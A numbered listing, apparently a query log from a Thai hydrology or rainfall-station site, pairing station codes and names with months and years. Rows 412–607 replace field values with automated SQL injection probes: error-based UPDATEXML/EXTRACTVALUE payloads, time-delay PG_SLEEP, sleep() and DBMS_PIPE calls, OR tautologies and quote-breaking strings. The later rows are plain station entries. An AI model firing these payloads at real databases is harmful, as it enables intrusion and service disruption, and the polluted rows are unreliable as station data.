412 16330 บ้า่นไฮ อำเภอ จังหวัด AND UPDATEXML(5506,CONCAT(0x2e,0x71626b7a71,(SELECT (ELT(5506=5506,1))),0x716a707171),4219)-- Tvkc 2556
413 16330 บ้า่นไฮ อำเภอ จังหวัด " AND UPDATEXML(5506,CONCAT(0x2e,0x71626b7a71,(SELECT (ELT(5506=5506,1))),0x716a707171),4219) AND " 2556
414 16330 บ้า่นไฮ อำเภอ จังหวัด ")) AND UPDATEXML(5506,CONCAT(0x2e,0x71626b7a71,(SELECT (ELT(5506=5506,1))),0x716a707171),4219) AND 2556
415 16330 บ้า่นไฮ อำเภอ จังหวัด ") AND UPDATEXML(5506,CONCAT(0x2e,0x71626b7a71,(SELECT (ELT(5506=5506,1))),0x716a707171),4219) AND 2556
416 16330 บ้า่นไฮ อำเภอ จังหวัด AND UPDATEXML(5506,CONCAT(0x2e,0x71626b7a71,(SELECT (ELT(5506=5506,1))),0x716a707171),4219) 2556
417 16330 บ้า่นไฮ อำเภอ จังหวัด ))) AND UPDATEXML(5506,CONCAT(0x2e,0x71626b7a71,(SELECT (ELT(5506=5506,1))),0x716a707171),4219) AND 2556
418 16330 บ้า่นไฮ อำเภอ จังหวัด )) AND UPDATEXML(5506,CONCAT(0x2e,0x71626b7a71,(SELECT (ELT(5506=5506,1))),0x716a707171),4219) AND 2556
419 16330 บ้า่นไฮ อำเภอ จังหวัด ) AND UPDATEXML(5506,CONCAT(0x2e,0x71626b7a71,(SELECT (ELT(5506=5506,1))),0x716a707171),4219) AND ( 2556
420 16330 บ้า่นไฮ อำเภอ จังหวัด ) AND UPDATEXML(5506,CONCAT(0x2e,0x71626b7a71,(SELECT (ELT(5506=5506,1))),0x716a707171),4219)-- CdG 2556
421 16330 บ้า่นไฮ อำเภอ จังหวัด AND EXTRACTVALUE(3889,CONCAT(0x5c,0x71626b7a71,(SELECT (ELT(3889=3889,1))),0x716a707171))# pnWg 2556
422 16330 บ้า่นไฮ อำเภอ จังหวัด AND EXTRACTVALUE(3889,CONCAT(0x5c,0x71626b7a71,(SELECT (ELT(3889=3889,1))),0x716a707171))-- LhmX 2556
423 16330 บ้า่นไฮ อำเภอ จังหวัด " AND EXTRACTVALUE(3889,CONCAT(0x5c,0x71626b7a71,(SELECT (ELT(3889=3889,1))),0x716a707171)) AND "fy 2556
424 16330 บ้า่นไฮ อำเภอ จังหวัด " AND EXTRACTVALUE(3889,CONCAT(0x5c,0x71626b7a71,(SELECT (ELT(3889=3889,1))),0x716a707171)) AND "yg 2556
425 16330 บ้า่นไฮ อำเภอ จังหวัด ")) AND EXTRACTVALUE(3889,CONCAT(0x5c,0x71626b7a71,(SELECT (ELT(3889=3889,1))),0x716a707171)) AND ( 2556
426 16330 บ้า่นไฮ อำเภอ จังหวัด ") AND EXTRACTVALUE(3889,CONCAT(0x5c,0x71626b7a71,(SELECT (ELT(3889=3889,1))),0x716a707171)) AND (" 2556
427 16330 บ้า่นไฮ อำเภอ จังหวัด AND EXTRACTVALUE(3889,CONCAT(0x5c,0x71626b7a71,(SELECT (ELT(3889=3889,1))),0x716a707171)) 2556
428 16330 บ้า่นไฮ อำเภอ จังหวัด ))) AND EXTRACTVALUE(3889,CONCAT(0x5c,0x71626b7a71,(SELECT (ELT(3889=3889,1))),0x716a707171)) AND ( 2556
429 16330 บ้า่นไฮ อำเภอ จังหวัด )) AND EXTRACTVALUE(3889,CONCAT(0x5c,0x71626b7a71,(SELECT (ELT(3889=3889,1))),0x716a707171)) AND (( 2556
430 16330 บ้า่นไฮ อำเภอ จังหวัด ) AND EXTRACTVALUE(3889,CONCAT(0x5c,0x71626b7a71,(SELECT (ELT(3889=3889,1))),0x716a707171)) AND (78 2556
431 16330 บ้า่นไฮ อำเภอ จังหวัด ) AND EXTRACTVALUE(3889,CONCAT(0x5c,0x71626b7a71,(SELECT (ELT(3889=3889,1))),0x716a707171))-- bxjn 2556
432 16330 บ้า่นไฮ อำเภอ จังหวัด " AND (SELECT 2352 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (ELT(2352=2352,1))),0x716a70717 2556
433 16330 บ้า่นไฮ อำเภอ จังหวัด ")) AND (SELECT 2352 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (ELT(2352=2352,1))),0x716a707 2556
434 16330 บ้า่นไฮ อำเภอ จังหวัด ") AND (SELECT 2352 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (ELT(2352=2352,1))),0x716a7071 2556
435 16330 บ้า่นไฮ อำเภอ จังหวัด AND (SELECT 2352 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (ELT(2352=2352,1))),0x716a707171 2556
436 16330 บ้า่นไฮ อำเภอ จังหวัด ))) AND (SELECT 2352 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (ELT(2352=2352,1))),0x716a707 2556
437 16330 บ้า่นไฮ อำเภอ จังหวัด )) AND (SELECT 2352 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (ELT(2352=2352,1))),0x716a7071 2556
438 16330 บ้า่นไฮ อำเภอ จังหวัด ) AND (SELECT 2352 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (ELT(2352=2352,1))),0x716a70717 2556
439 16330 บ้า่นไฮ อำเภอ จังหวัด 2556
440 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม 2565*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),12)
441 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม -1)) OR 538=(SELECT 538 FROM PG_SLEEP(12))--
442 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม -5) OR 756=(SELECT 756 FROM PG_SLEEP(12))--
443 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม -5 OR 74=(SELECT 74 FROM PG_SLEEP(12))--
444 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ 2556*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),12)
445 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z
446 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม if(now()=sysdate(),sleep(12),0)
447 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ -1)) OR 576=(SELECT 576 FROM PG_SLEEP(12))--
448 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม -1" OR 2+960-960-1=0+0+0+1 --
449 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม -1 OR 2+953-953-1=0+0+0+1
450 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม -1 OR 2+189-189-1=0+0+0+1 --
451 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ -5) OR 273=(SELECT 273 FROM PG_SLEEP(12))--
452 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ -5 OR 118=(SELECT 118 FROM PG_SLEEP(12))--
453 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z
454 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ if(now()=sysdate(),sleep(12),0)
455 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ -1" OR 2+254-254-1=0+0+0+1 --
456 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ -1 OR 2+229-229-1=0+0+0+1
457 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ -1 OR 2+690-690-1=0+0+0+1 --
458 07391 สชป.1 อำเภอ จังหวัด เมษายน -1)) OR 701=(SELECT 701 FROM PG_SLEEP(22))--
459 07391 สชป.1 อำเภอ จังหวัด เมษายน -5) OR 641=(SELECT 641 FROM PG_SLEEP(22))--
460 07391 สชป.1 อำเภอ จังหวัด เมษายน -5 OR 330=(SELECT 330 FROM PG_SLEEP(22))--
461 07391 สชป.1 อำเภอ จังหวัด เมษายน 0"XOR(if(now()=sysdate(),sleep(22),0))XOR"Z
462 -1" OR 2+551-551-1=0+0+0+1 -- สชป.1 อำเภอ จังหวัด สิงหาคม 2565
463 -1 OR 2+187-187-1=0+0+0+1 สชป.1 อำเภอ จังหวัด สิงหาคม 2565
464 -1 OR 2+805-805-1=0+0+0+1 -- สชป.1 อำเภอ จังหวัด สิงหาคม 2565
465 20111 น้ำปาย อำเภอ จังหวัด มิถุนายน 2565*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),12)
466 07391 สชป.1 อำเภอ จังหวัด เมษายน 0
467 20111 น้ำปาย อำเภอ จังหวัด มิถุนายน -1)) OR 119=(SELECT 119 FROM PG_SLEEP(12))--
468 07391 สชป.1 อำเภอ จังหวัด เมษายน if(now()=sysdate(),sleep(22),0)
469 20111 น้ำปาย อำเภอ จังหวัด มิถุนายน -5) OR 254=(SELECT 254 FROM PG_SLEEP(12))--
470 07391 สชป.1 อำเภอ จังหวัด เมษายน -1" OR 2+128-128-1=0+0+0+1 --
471 07391 สชป.1 อำเภอ จังหวัด เมษายน -1 OR 2+947-947-1=0+0+0+1
472 07391 สชป.1 อำเภอ จังหวัด เมษายน -1 OR 2+557-557-1=0+0+0+1 --
473 20111 น้ำปาย อำเภอ จังหวัด มิถุนายน -5 OR 966=(SELECT 966 FROM PG_SLEEP(12))--
474 if(now()=sysdate(),sleep(12),0) น้ำปาย อำเภอ จังหวัด กุมภาพันธ์ 2556
475 -1" OR 2+438-438-1=0+0+0+1 -- น้ำปาย อำเภอ จังหวัด กุมภาพันธ์ 2556
476 -1 OR 2+182-182-1=0+0+0+1 น้ำปาย อำเภอ จังหวัด กุมภาพันธ์ 2556
477 -1 OR 2+873-873-1=0+0+0+1 -- น้ำปาย อำเภอ จังหวัด กุมภาพันธ์ 2556
478 20111 น้ำปาย อำเภอ จังหวัด มิถุนายน 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z
479 20111 น้ำปาย อำเภอ จังหวัด มิถุนายน 0
480 20111 น้ำปาย อำเภอ จังหวัด มิถุนายน if(now()=sysdate(),sleep(12),0)
481 20111 น้ำปาย อำเภอ จังหวัด มิถุนายน -1" OR 2+113-113-1=0+0+0+1 --
482 20111 น้ำปาย อำเภอ จังหวัด มิถุนายน -1 OR 2+835-835-1=0+0+0+1
483 20111 น้ำปาย อำเภอ จังหวัด มิถุนายน -1 OR 2+996-996-1=0+0+0+1 --
484 07391*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),12.788) น้ำปาย อำเภอ จังหวัด เมษายน 2556
485 -5 OR 376=(SELECT 376 FROM PG_SLEEP(12.788))-- น้ำปาย อำเภอ จังหวัด เมษายน 2556
486 20111 น้ำปาย อำเภอ จังหวัด -1" OR 2+452-452-1=0+0+0+1 -- 2565
487 20111 น้ำปาย อำเภอ จังหวัด -1 OR 2+314-314-1=0+0+0+1 2565
488 20111 น้ำปาย อำเภอ จังหวัด -1 OR 2+710-710-1=0+0+0+1 -- 2565
489 0"XOR(if(now()=sysdate(),sleep(12.788),0))XOR"Z น้ำปาย อำเภอ จังหวัด เมษายน 2556
490 if(now()=sysdate(),sleep(12.788),0) น้ำปาย อำเภอ จังหวัด เมษายน 2556
491 -1" OR 2+173-173-1=0+0+0+1 -- น้ำปาย อำเภอ จังหวัด เมษายน 2556
492 -1 OR 2+319-319-1=0+0+0+1 น้ำปาย อำเภอ จังหวัด เมษายน 2556
493 -1 OR 2+610-610-1=0+0+0+1 -- น้ำปาย อำเภอ จังหวัด เมษายน 2556
494 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z น้ำปาย อำเภอ จังหวัด มิถุนายน 2565
495 16330 บ้า่นไฮ อำเภอ จังหวัด 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z 2556
496 if(now()=sysdate(),sleep(12),0) บ้า่นไฮ อำเภอ จังหวัด มิถุนายน 2565
497 -1" OR 2+369-369-1=0+0+0+1 -- บ้า่นไฮ อำเภอ จังหวัด มิถุนายน 2565
498 -1 OR 2+624-624-1=0+0+0+1 บ้า่นไฮ อำเภอ จังหวัด มิถุนายน 2565
499 -1 OR 2+867-867-1=0+0+0+1 -- บ้า่นไฮ อำเภอ จังหวัด มิถุนายน 2565
500 16330 บ้า่นไฮ อำเภอ จังหวัด -1" OR 2+965-965-1=0+0+0+1 -- 2556
501 16330 บ้า่นไฮ อำเภอ จังหวัด -1 OR 2+298-298-1=0+0+0+1 2556
502 16330 บ้า่นไฮ อำเภอ จังหวัด -1 OR 2+807-807-1=0+0+0+1 -- 2556
503 07391 สชป.1 อำเภอ จังหวัด 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z 2556
504 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม @@923EI
505 @@EH5TQ น้ำปาย อำเภอ จังหวัด สิงหาคม 2565
506 20111 น้ำปาย อำเภอ จังหวัด @@TF18r 2565
507 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ @@rRMFP
508 @@qYOzw บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ 2556
509 16330 บ้า่นไฮ อำเภอ จังหวัด @@0zVjf 2556
510 07391 สชป.1 อำเภอ จังหวัด 0 2556
511 07391 สชป.1 อำเภอ จังหวัด if(now()=sysdate(),sleep(12),0) 2556
512 07391 สชป.1 อำเภอ จังหวัด -1" OR 2+469-469-1=0+0+0+1 -- 2556
513 07391 สชป.1 อำเภอ จังหวัด -1 OR 2+244-244-1=0+0+0+1 2556
514 07391 สชป.1 อำเภอ จังหวัด -1 OR 2+107-107-1=0+0+0+1 -- 2556
515 20111 น้ำปาย อำเภอ จังหวัด -1" OR 2+379-379-1=0+0+0+1 -- 2565
516 20111 น้ำปาย อำเภอ จังหวัด -1 OR 2+733-733-1=0+0+0+1 2565
517 20111 น้ำปาย อำเภอ จังหวัด -1 OR 2+532-532-1=0+0+0+1 -- 2565
518 07391 สชป.1 อำเภอ จังหวัด เมษายน ?'?""
519 07391 สชป.1 อำเภอ จังหวัด เมษายน JyI=
520 07391 สชป.1 อำเภอ จังหวัด เมษายน @@8Nkwi
521 07391 สชป.1 อำเภอ จังหวัด เมษายน 1????%2527%2522
522 ?'?"" สชป.1 อำเภอ จังหวัด เมษายน 2556
523 JyI= สชป.1 อำเภอ จังหวัด เมษายน 2556
524 @@esgrY สชป.1 อำเภอ จังหวัด เมษายน 2556
525 1????%2527%2522 สชป.1 อำเภอ จังหวัด เมษายน 2556
526 07391 สชป.1 อำเภอ จังหวัด ?'?"" 2556
527 07391 สชป.1 อำเภอ จังหวัด JyI= 2556
528 07391 สชป.1 อำเภอ จังหวัด @@caj5c 2556
529 07391 สชป.1 อำเภอ จังหวัด 1????%2527%2522 2556
530 07391 สชป.1 อำเภอ จังหวัด เมษายน 2556
531 20111 น้ำปาย อำเภอ จังหวัด มิถุนายน ?'?""
532 20111 น้ำปาย อำเภอ จังหวัด มิถุนายน JyI=
533 20111 น้ำปาย อำเภอ จังหวัด มิถุนายน @@Oe6ZM
534 20111 น้ำปาย อำเภอ จังหวัด มิถุนายน 1????%2527%2522
535 ?'?"" น้ำปาย อำเภอ จังหวัด มิถุนายน 2565
536 JyI= น้ำปาย อำเภอ จังหวัด มิถุนายน 2565
537 @@GHDcA น้ำปาย อำเภอ จังหวัด มิถุนายน 2565
538 1????%2527%2522 น้ำปาย อำเภอ จังหวัด มิถุนายน 2565
539 20111 น้ำปาย อำเภอ จังหวัด @@gMaLc 2565
540 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม 2565*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),124.048)
541 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม -5) OR 628=(SELECT 628 FROM PG_SLEEP(124.048))--
542 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ 2556*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),56.928)
543 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม -5 OR 801=(SELECT 801 FROM PG_SLEEP(124.048))--
544 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ -1)) OR 997=(SELECT 997 FROM PG_SLEEP(56.928))--
545 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ -5) OR 738=(SELECT 738 FROM PG_SLEEP(56.928))--
546 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ -5 OR 324=(SELECT 324 FROM PG_SLEEP(56.928))--
547 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม 0"XOR(if(now()=sysdate(),sleep(124.048),0))XOR"Z
548 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม 0
549 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม if(now()=sysdate(),sleep(124.048),0)
550 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม -1" OR 2+220-220-1=0+0+0+1 --
551 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ 0
552 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ if(now()=sysdate(),sleep(28.464),0)
553 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ -1" OR 2+384-384-1=0+0+0+1 --
554 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ -1 OR 2+49-49-1=0+0+0+1
555 20111*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),12) บ้า่นไฮ อำเภอ จังหวัด สิงหาคม 2565
556 -1)) OR 205=(SELECT 205 FROM PG_SLEEP(12))-- บ้า่นไฮ อำเภอ จังหวัด สิงหาคม 2565
557 -5) OR 744=(SELECT 744 FROM PG_SLEEP(12))-- บ้า่นไฮ อำเภอ จังหวัด สิงหาคม 2565
558 -5 OR 870=(SELECT 870 FROM PG_SLEEP(12))-- บ้า่นไฮ อำเภอ จังหวัด สิงหาคม 2565
559 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z บ้า่นไฮ อำเภอ จังหวัด สิงหาคม 2565
560 0 บ้า่นไฮ อำเภอ จังหวัด สิงหาคม 2565
561 if(now()=sysdate(),sleep(12),0) บ้า่นไฮ อำเภอ จังหวัด สิงหาคม 2565
562 -1" OR 3+192-192-1=0+0+0+1 -- บ้า่นไฮ อำเภอ จังหวัด สิงหาคม 2565
563 -1" OR 2+192-192-1=0+0+0+1 -- บ้า่นไฮ อำเภอ จังหวัด สิงหาคม 2565
564 1 บ้า่นไฮ อำเภอ จังหวัด สิงหาคม 2565
565 -1 OR 3+266-266-1=0+0+0+1 บ้า่นไฮ อำเภอ จังหวัด สิงหาคม 2565
566 -1 OR 2+266-266-1=0+0+0+1 บ้า่นไฮ อำเภอ จังหวัด สิงหาคม 2565
567 -1 OR 3+607-607-1=0+0+0+1 -- บ้า่นไฮ อำเภอ จังหวัด สิงหาคม 2565
568 -1 OR 2+607-607-1=0+0+0+1 -- บ้า่นไฮ อำเภอ จังหวัด สิงหาคม 2565
569 16330 บ้า่นไฮ อำเภอ จังหวัด 0 2556
570 16330 บ้า่นไฮ อำเภอ จังหวัด if(now()=sysdate(),sleep(12),0) 2556
571 16330 บ้า่นไฮ อำเภอ จังหวัด -1" OR 3+85-85-1=0+0+0+1 -- 2556
572 16330 บ้า่นไฮ อำเภอ จังหวัด -1" OR 2+85-85-1=0+0+0+1 -- 2556
573 16330 บ้า่นไฮ อำเภอ จังหวัด 1 2556
574 16330 บ้า่นไฮ อำเภอ จังหวัด -1 OR 3+835-835-1=0+0+0+1 2556
575 16330 บ้า่นไฮ อำเภอ จังหวัด -1 OR 2+835-835-1=0+0+0+1 2556
576 16330 บ้า่นไฮ อำเภอ จังหวัด -1 OR 3+81-81-1=0+0+0+1 -- 2556
577 16330 บ้า่นไฮ อำเภอ จังหวัด -1 OR 2+81-81-1=0+0+0+1 -- 2556
578 20111 น้ำปาย อำเภอ จังหวัด 0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z 2565
579 20111 น้ำปาย อำเภอ จังหวัด 0 2565
580 20111 น้ำปาย อำเภอ จังหวัด if(now()=sysdate(),sleep(12),0) 2565
581 20111 น้ำปาย อำเภอ จังหวัด -1" OR 2+272-272-1=0+0+0+1 -- 2565
582 20111 น้ำปาย อำเภอ จังหวัด -1 OR 2+305-305-1=0+0+0+1 2565
583 20111 น้ำปาย อำเภอ จังหวัด -1 OR 2+870-870-1=0+0+0+1 -- 2565
584 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม ?'?""
585 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม JyI=
586 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม @@Qhcn7
587 20111 น้ำปาย อำเภอ จังหวัด สิงหาคม 1????%2527%2522
588 ?'?"" น้ำปาย อำเภอ จังหวัด สิงหาคม 2565
589 JyI= น้ำปาย อำเภอ จังหวัด สิงหาคม 2565
590 @@FVIVL น้ำปาย อำเภอ จังหวัด สิงหาคม 2565
591 1????%2527%2522 น้ำปาย อำเภอ จังหวัด สิงหาคม 2565
592 20111 น้ำปาย อำเภอ จังหวัด ?'?"" 2565
593 20111 น้ำปาย อำเภอ จังหวัด JyI= 2565
594 20111 น้ำปาย อำเภอ จังหวัด @@tQKGE 2565
595 20111 น้ำปาย อำเภอ จังหวัด 1????%2527%2522 2565
596 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ ?'?""
597 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ JyI=
598 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ @@tT3HY
599 16330 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ 1????%2527%2522
600 ?'?"" บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ 2556
601 JyI= บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ 2556
602 @@GdMl3 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ 2556
603 1????%2527%2522 บ้า่นไฮ อำเภอ จังหวัด กุมภาพันธ์ 2556
604 16330 บ้า่นไฮ อำเภอ จังหวัด ?'?"" 2556
605 16330 บ้า่นไฮ อำเภอ จังหวัด JyI= 2556
606 16330 บ้า่นไฮ อำเภอ จังหวัด @@3itR2 2556
607 16330 บ้า่นไฮ อำเภอ จังหวัด 1????%2527%2522 2556
608 73100 หน่วยอุทกวิทายา จ.พะเยา อำเภอ จังหวัด สิงหาคม 2565
609 08271 หน่วยอุทกวิทยา จ.เชียงราย อำเภอ จังหวัด สิงหาคม 2565
610 28331 โครงการชลประทานน่าน อำเภอ จังหวัด สิงหาคม 2565
611 730171 บ้านมาง อำเภอ จังหวัด สิงหาคม 2565
612 40111 บ้านห้วยสัก อำเภอ จังหวัด สิงหาคม 2565
613 40151 บ้านน้ำโค้ง อำเภอ จังหวัด สิงหาคม 2565
614 071560 โครงการประตูระบายน้ำแม่สอย อำเภอ จังหวัด สิงหาคม 2565
615 071511 โครงการอ่างเก็บน้ำห้วยลึก อำเภอ จังหวัด สิงหาคม 2565
616 07790 อบต.เทพเสด็จ อำเภอ จังหวัด สิงหาคม 2565
617 07780 อนามัยนาเม็ง อำเภอ จังหวัด สิงหาคม 2565
618 07770 อนามัยห้วยแก้ว อำเภอ จังหวัด สิงหาคม 2565
619 07760 อนามัยห้วยหม้อ อำเภอ จังหวัด สิงหาคม 2565
620 071011 โครงการหลวงขุนวาง อำเภอ จังหวัด สิงหาคม 2565
621 07810 โครงการหลวงทุ่งหลวง อำเภอ จังหวัด สิงหาคม 2565
622 07801 น้ำแม่วาง อำเภอ จังหวัด สิงหาคม 2565
623 17181 บ้านแม่อีไฮ อำเภอ จังหวัด สิงหาคม 2565
624 07751 บ้านม่วงป๊อก อำเภอ จังหวัด สิงหาคม 2565
625 070731 น้ำแม่ตื่น อำเภอ จังหวัด สิงหาคม 2565
626 07391 สชป.1 อำเภอ จังหวัด สิงหาคม 2565
627 20111 น้ำปาย อำเภอ จังหวัด กรกฎาคม 2565
628 73100 หน่วยอุทกวิทายา จ.พะเยา อำเภอ จังหวัด กรกฎาคม 2565
629 08271 หน่วยอุทกวิทยา จ.เชียงราย อำเภอ จังหวัด กรกฎาคม 2565
630 28331 โครงการชลประทานน่าน อำเภอ จังหวัด กรกฎาคม 2565
631 730171 บ้านมาง อำเภอ จังหวัด กรกฎาคม 2565
632 40111 บ้านห้วยสัก อำเภอ จังหวัด กรกฎาคม 2565
633 40151 บ้านน้ำโค้ง อำเภอ จังหวัด กรกฎาคม 2565
634 071560 โครงการประตูระบายน้ำแม่สอย อำเภอ จังหวัด กรกฎาคม 2565
635 071511 โครงการอ่างเก็บน้ำห้วยลึก อำเภอ จังหวัด กรกฎาคม 2565
636 07790 อบต.เทพเสด็จ อำเภอ จังหวัด กรกฎาคม 2565
637 07780 อนามัยนาเม็ง อำเภอ จังหวัด กรกฎาคม 2565
638 07770 อนามัยห้วยแก้ว อำเภอ จังหวัด กรกฎาคม 2565
639 07760 อนามัยห้วยหม้อ อำเภอ จังหวัด กรกฎาคม 2565
640 071011 โครงการหลวงขุนวาง อำเภอ จังหวัด กรกฎาคม 2565
641 07810 โครงการหลวงทุ่งหลวง อำเภอ จังหวัด กรกฎาคม 2565
642 07801 น้ำแม่วาง อำเภอ จังหวัด กรกฎาคม 2565
643 17181 บ้านแม่อีไฮ อำเภอ จังหวัด กรกฎาคม 2565
644 07751 บ้านม่วงป๊อก อำเภอ จังหวัด กรกฎาคม 2565
645 070731 น้ำแม่ตื่น อำเภอ จังหวัด กรกฎาคม 2565
646 07391 สชป.1 อำเภอ จังหวัด กรกฎาคม 2565
647 16151 W.15A อำเภอ จังหวัด สิงหาคม 2565
648 16330 บ้า่นไฮ อำเภอ จังหวัด สิงหาคม 2565
649 16151 W.15A อำเภอ จังหวัด กรกฎาคม 2565
650 16330 บ้า่นไฮ อำเภอ จังหวัด กรกฎาคม 2565
651 73100 หน่วยอุทกวิทายา จ.พะเยา อำเภอ จังหวัด มิถุนายน 2565
652 08271 หน่วยอุทกวิทยา จ.เชียงราย อำเภอ จังหวัด มิถุนายน 2565
653 28331 โครงการชลประทานน่าน อำเภอ จังหวัด มิถุนายน 2565
654 730171 บ้านมาง อำเภอ จังหวัด มิถุนายน 2565
655 40111 บ้านห้วยสัก อำเภอ จังหวัด มิถุนายน 2565
656 40151 บ้านน้ำโค้ง อำเภอ จังหวัด มิถุนายน 2565
657 071560 โครงการประตูระบายน้ำแม่สอย อำเภอ จังหวัด มิถุนายน 2565
658 071511 โครงการอ่างเก็บน้ำห้วยลึก อำเภอ จังหวัด มิถุนายน 2565
659 07790 อบต.เทพเสด็จ อำเภอ จังหวัด มิถุนายน 2565
660 07780 อนามัยนาเม็ง อำเภอ จังหวัด มิถุนายน 2565
661 07770 อนามัยห้วยแก้ว อำเภอ จังหวัด มิถุนายน 2565
662 07760 อนามัยห้วยหม้อ อำเภอ จังหวัด มิถุนายน 2565
663 071011 โครงการหลวงขุนวาง อำเภอ จังหวัด มิถุนายน 2565
664 07810 โครงการหลวงทุ่งหลวง อำเภอ จังหวัด มิถุนายน 2565
665 07801 น้ำแม่วาง อำเภอ จังหวัด มิถุนายน 2565
666 17181 บ้านแม่อีไฮ อำเภอ จังหวัด มิถุนายน 2565
667 07751 บ้านม่วงป๊อก อำเภอ จังหวัด มิถุนายน 2565
668 070731 น้ำแม่ตื่น อำเภอ จังหวัด มิถุนายน 2565
669 07391 สชป.1 อำเภอ จังหวัด มิถุนายน 2565
670 16151 W.15A อำเภอ จังหวัด มิถุนายน 2565
671 16330 บ้า่นไฮ อำเภอ จังหวัด มิถุนายน 2565
672 20111 น้ำปาย อำเภอ จังหวัด พฤษภาคม 2565
673 73100 หน่วยอุทกวิทายา จ.พะเยา อำเภอ จังหวัด พฤษภาคม 2565
674 08271 หน่วยอุทกวิทยา จ.เชียงราย อำเภอ จังหวัด พฤษภาคม 2565
675 28331 โครงการชลประทานน่าน อำเภอ จังหวัด พฤษภาคม 2565
676 730171 บ้านมาง อำเภอ จังหวัด พฤษภาคม 2565
677 40111 บ้านห้วยสัก อำเภอ จังหวัด พฤษภาคม 2565
678 40151 บ้านน้ำโค้ง อำเภอ จังหวัด พฤษภาคม 2565
679 071560 โครงการประตูระบายน้ำแม่สอย อำเภอ จังหวัด พฤษภาคม 2565
680 071511 โครงการอ่างเก็บน้ำห้วยลึก อำเภอ จังหวัด พฤษภาคม 2565
681 07790 อบต.เทพเสด็จ อำเภอ จังหวัด พฤษภาคม 2565
682 07780 อนามัยนาเม็ง อำเภอ จังหวัด พฤษภาคม 2565
683 07770 อนามัยห้วยแก้ว อำเภอ จังหวัด พฤษภาคม 2565
684 07760 อนามัยห้วยหม้อ อำเภอ จังหวัด พฤษภาคม 2565
685 071011 โครงการหลวงขุนวาง อำเภอ จังหวัด พฤษภาคม 2565
686 07810 โครงการหลวงทุ่งหลวง อำเภอ จังหวัด พฤษภาคม 2565
687 07801 น้ำแม่วาง อำเภอ จังหวัด พฤษภาคม 2565
688 17181 บ้านแม่อีไฮ อำเภอ จังหวัด พฤษภาคม 2565
689 07751 บ้านม่วงป๊อก อำเภอ จังหวัด พฤษภาคม 2565
690 070731 น้ำแม่ตื่น อำเภอ จังหวัด พฤษภาคม 2565
691 07391 สชป.1 อำเภอ จังหวัด พฤษภาคม 2565
692 20111 น้ำปาย อำเภอ จังหวัด เมษายน 2565
693 73100 หน่วยอุทกวิทายา จ.พะเยา อำเภอ จังหวัด เมษายน 2565
